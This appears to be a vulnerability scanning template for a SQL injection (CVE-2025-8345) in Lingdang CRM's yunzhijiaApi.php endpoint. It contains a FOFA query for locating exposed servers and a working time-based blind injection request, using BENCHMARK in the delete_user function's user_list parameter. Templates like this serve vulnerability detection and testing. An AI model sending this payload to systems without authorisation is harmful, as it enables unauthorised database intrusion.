id: lingdang-crm-yunzhijiaApi-sqli
info:
  name: 灵当CRM yunzhijiaApi.php 存在SQL注入
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://vip.bdziyi.com/58494/
  classification:
    cve-id: CVE-2025-8345
  metadata:
    verified: true
    fofa-query: body="crmcommon/js/jquery/jquery-1.10.1.min.js"||body="http://localhost:8088/crm/index.php"&&body="ldcrm.base.js"||title="灵当CRM"||body="include/js/ldAjax.js"||title="连接ERP服务管理控制台" && body="登录管理后台"
    tips:
    repair:
    sqlmap:
    version:
  tags: sqli,lingdang

http:
  - raw:  
      - |
        @timeout: 15s
        GET /crm/WeiXinApp/yunzhijia/yunzhijiaApi.php?function=delete_user&user_list={%22name%22:%22admin%27)+AND+6731=BENCHMARK(10000000,MD5(0x79414d76))--+SYit%22} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - duration >= 3 && duration < 5
        condition: and